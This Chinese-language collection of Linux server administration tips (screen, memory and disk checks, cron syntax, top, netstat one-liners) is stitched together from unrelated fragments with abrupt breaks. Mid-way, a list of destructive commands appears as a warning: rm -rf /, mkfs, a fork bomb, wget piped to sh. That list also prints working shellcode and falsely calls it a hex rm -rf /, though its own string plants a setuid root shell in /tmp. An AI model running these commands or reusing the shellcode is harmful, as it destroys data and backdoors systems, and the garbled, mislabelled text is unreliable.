1、首先介绍便于远程执行长时间操作的screen命令

VPS往往都是远程SSH管理，这样直接输入命令操作，对于简短的命令是可行的。但如果有需要长时间执行的操作，比如yum/apt-get安装操作、执行软件安装脚本等，会发现SSH的直接操作非常不便，一旦SSH断线，操作便会异常终止。

其实解决这个问题的方法有两种：
1、直接通过VNC屏幕控制台操作
2、依然使用SSH，但在screen终端中执行命令

第二种方法，实际上是使用screen终端模拟了多个“控制台”，在模拟的“控制台”里，不仅可以并行执行多个操作，还可以在关闭SSH后命令依然后台执行。（颇像直接操作Linux的Alt+F？的多控制台切换）

点击此处查看本站教程：screen命令的使用方法

2、查看内存使用情况：free

[root@vm ~]# free
total used free shared buffers cached
Mem: 514860 481808 33052 0 107536 134892
-/+ buffers/cache: 239380 275480
Swap: 1048568 80 1048488

free命令将显示相关的内存使用情况，注意：对于独立服务器或者XEN/KVM架构的虚拟机，free命令显示的free那一列并非真实的剩余内存。

3、查看磁盘分区使用情况：fdisk与df

[root@www ~]# fdisk -l
Disk /dev/hda: 16.1 GB, 16106127360 bytes
255 heads, 63 sectors/track, 1958 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes

Device Boot Start End Blocks Id System
/dev/hda1 * 1 13 104391 83 Linux
/dev/hda2 14 1958 15623212+ 8e Linux LVM

查看各个分区的使用：df -hl

[root@www ~]# df -hl
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/VolGroup00-LogVol00
14G 2.9G 9.9G 23% /
/dev/hda1 99M 19M 76M 20% /boot
tmpfs 252M 0 252M 0% /dev/shm

4、查看系统负载与运行状况：uptime

[root@www ~]# uptime
13:36:09 up 2 days, 16:09, 1 user, load average: 0.03, 0.02, 0.00

表示系统启动的时间，后面的load average三个数分别表示最近1分钟、5分钟、15分钟的系统平均负载。

一般来说，一个CPU核心的满负载数值为1，有几个核心，满负载状态就为几。如果Load超出这个数，说明系统中有等待处理的排队请求。实际使用中，一般不要让Load大于CPU总核心数×2，否则系统效率将大打折扣。

5、查看当前用户/查看当前路径/查看当前时间/打印所有进程列表

[root@www local]# who

root pts/0 2012-01-14 13:35 (58.47.62.202)
[root@www local]# whoami
root
[root@www local]# pwd
/usr/local
[root@www local]# date
Sat Jan 14 13:44:39 CST 2012
[root@www local]# ps -aux
Warning: bad syntax, perhaps a bogus ‘-’? See /usr/share/doc/procps-3.2.7/FAQ
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 2160 648 ? Ss Jan11 0:01 init [3]
root 2 0.0 0.0 0 0 ? S< Jan11 0:00 [migration/0]
root 3 0.0 0.0 0 0 ? SN Jan11 0:00 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? S< Jan11 0:00 [watchdog/0]
root 5 0.0 0.0 0 0 ? S< Jan11 0:00 [migration/1]
…

yum install -y vixie-cron

然后启动服务

service crond start

二、设置计划任务
（1）执行下面的命令来设置计划任务:

crontab -e

之所以要使用上面的命令而不是直接使用vi，是因为cron要进行为数不多但是非常必要的语法检查。
（2）设置计划任务的规范：
t1 t2 t3 t4 t5 program

t1 表示分钟，
t2 表示小时，
t3 表示一个月份中的第几日，
t4 表示月份，
t5 表示一个星期中的第几天。
program 表示要执行的程式。
（3）一些示例：
每月每天每小时的第 0 分钟执行一次 /bin/ls :

0 * * * * /bin/ls

在 12 月内, 每天的早上 6 点到 12 点中，每隔 20 分钟执行一次 /usr/bin/backup :

*/20 6-12 * 12 * /usr/bin/backup

周一到周五每天下午 5:00 寄一封信给 alex@domain.name :

0 17 * * 1-5 mail -s “hi” alex@domain.name < /tmp/maildata

每月每天的午夜 0 点 20 分, 2 点 20 分, 4 点 20 分….执行 echo “haha”

20 0-23/2 * * * echo “haha”

晚上11点到早上8点之间每两个小时，和早上八点，执行date命令。

0 23-7/2，8 * * * date

1. rm -rf / 此命令将递归并强制删除 / 目录下的所有文件。
2.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

这是 rm -rf / 的 hex（十六进制）版本，很能迷惑 Linux 用户。
3. mkfs.ext3 /dev/sda 这将对硬盘进行重新格式化，自然，硬盘上的所有数据将灰飞烟灭。
4. : ( ){  : |:& };: 著名的 fork bomp，此命令将告诉你的系统执行海量的进程，直到你的系统僵死。
5. any_command > /dev/sda 使用该命令，原始数据将被写到块设备，其结果是造成数据丢失。
6. wget http://some_untrusted_source -O- | sh 不要从不信任的地方下载东西，这可能会获取恶意代码。
7. mv /home/yourhomedirectory/* /dev/null 此命令将移动主目录中的所有文件到一个不存在的地方，你将再也看不到那些文件。

top命令是Linux下常用的性能分析工具，能够实时显示系统中各个进程的资源占用状况，类似于Windows的任务管理器。下面详细介绍它的使用方法。

统计信息区

前五行是系统整体的统计信息。第一行是任务队列信息，同 uptime 命令的执行结果。其内容如下：

第二、三行为进程和CPU的信息。当有多个CPU时，这些内容可能会超过两行。内容如下：

最后两行为内存信息。内容如下：

进程信息区

统计信息区域的下方显示了各个进程的详细信息。首先来认识一下各列的含义。

默认情况下仅显示比较重要的 PID、USER、PR、NI、VIRT、RES、SHR、S、%CPU、%MEM、TIME+、COMMAND 列。可以通过下面的快捷键来更改显示内容。

更改显示内容

通过 f 键可以选择显示的内容。按 f 键之后会显示列的列表，按 a-z 即可显示或隐藏对应的列，最后按回车键确定。

按 o 键可以改变列的显示顺序。按小写的 a-z 可以将相应的列向右移动，而大写的 A-Z 可以将相应的列向左移动。最后按回车键确定。

按大写的 F 或 O 键，然后按 a-z 可以将进程按照相应的列进行排序。而大写的 R 键可以将当前的排序倒转。

命令使用

1． 工具（命令）名称
top
2．工具（命令）作用
显示系统当前的进程和其他 状况； top是一个动态显示过程,即可以通过用户按键来不断刷新当前状态.如果在前台执行该命令,它将独占前台,直到用户终止该程序为止. 比较准确的说,top命令提供了实时的对系统处理器的状态监视.它将显示系统中CPU最“敏感”的任务列表.该命令可以按CPU使用.内存使用和执行时间 对任务进行排序；而且该命令的很多特性都可以通过交互式命令或者在个人定制文件中进行设定.
3．环境设置
在Linux下使用。
4．使用方法
4.1 使用格式
top [-] [d] [p] [q] [c] [C] [S] [s]  [n]
4.2 参数说明
 d 指定每两次屏幕信息刷新之间的时间间隔。当然用户可以使用s交互命令来改变之。
 p 通过指定监控进程ID来仅仅监控某个进程的状态。
 q该选项将使top没有任何延迟的进行刷新。如果调用程序有超级用户权限，那么top将以尽可能高的优先 级运行。
 S 指定累计模式
 s 使top命令在安全模式中运行。这将去除交互命令所带来的潜在危险。
 i  使top不显示任何闲置或者僵死进程。
 c  显示整个命令行而不只是显示命令名
4.3 其他
下面介绍在top命令执行过程中可以使用的一些交互命令。从使用角度来看，熟练的掌握这些命令比掌握选项还重要一些。这些命令都是单字母 的，如果在命令行选项中使用了s选项，则可能其中一些命令会被屏蔽掉。
Ctrl+L 擦除并且重写屏幕。
h或者? 显示帮助画面，给出一些简短的命令总结说明。
k 终止一个进程。系统将提示用户输入需要终止的进程PID，以及需要发送给该进程什么样的信号。一般的终止进程可以使用15信号；如果不能正常结束那就使用 信号9强制结束该进程。默认值是信号15。在安全模式中此命令被屏蔽。
i 忽略 闲置和僵死进程。这是一个开关式命令。
q 退出程序。
r 重新安排一个进程的优先级别。系统提示用户输入需要改变的进程PID以及需要设置的进程优先级值。输 入一个正值将使优先级降低，反之则可以使该进程拥有更高的优先权。默认值是10。
S 切 换到累计模式。
s 改变两次刷新之间的延迟时间。系统将提示用户输入新的时间， 单位为s。如果有小数，就换算成m s。输入0值则系统将不断刷新，默认值是5 s。需要注意的是如果设置太小的时间，很可能会引起不断刷新，从而根本来不及看清显示的情况，而且系统负载也会大大增加。
f或者F 从当前显示中添加或者删除项目。
o 或者O 改变显示项目的顺序。
l 切换显示平均负载和启动时间信息。
m 切换显示内存信息。
t 切换显示进程和CPU状态信息。
c 切 换显示命令名称和完整命令行。
M 根据驻留内存大小进行排序。
P 根据CPU使用百分比大小进行排序。
T 根据时间/累计时间进行排序。
W 将当前设置写入~/.toprc文件中。这是写top配置文件的推荐方法。

netstat -nat|grep -i “80″|wc -l

对连接的IP按连接数量进行排序

netstat -ntu | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n

查看TCP连接状态

netstat -nat |awk ‘{print $6}’|sort|uniq -c|sort -rn
netstat -n | awk ‘/^tcp/ {++S[$NF]};END {for(a in S) print a, S[a]}’
netstat -n | awk ‘/^tcp/ {++state[$NF]}; END {for(key in state) print key,”\t”,state[key]}’
netstat -n | awk ‘/^tcp/ {++arr[$NF]};END {for(k in arr) print k,”\t”,arr[k]}’
netstat -n |awk ‘/^tcp/ {print $NF}’|sort|uniq -c|sort -rn
netstat -ant | awk ‘{print $NF}’ | grep -v ‘[a-z]‘ | sort | uniq -c

查看80端口连接数最多的20个IP

netstat -anlp|grep 80|grep tcp|awk ‘{print $5}’|awk -F: ‘{print $1}’|sort|uniq -c|sort -nr|head -n20
netstat -ant |awk ‘/:80/{split($5,ip,”:”);++A[ip[1]]}END{for(i in A) print A,i}’ |sort -rn|head -n20

用tcpdump嗅探80端口的访问看看谁最高

tcpdump -i eth0 -tnn dst port 80 -c 1000 | awk -F”.” ‘{print $1″.”$2″.”$3″.”$4}’ | sort | uniq -c | sort -nr |head -20

查找较多time_wait连接

netstat -n|grep TIME_WAIT|awk ‘{print $5}’|sort|uniq -c|sort -rn|head -n20

查找较多的SYN连接

netstat -an | grep SYN | awk ‘{print $5}’ | awk -F: ‘{print $1}’ | sort | uniq -c | sort -nr | more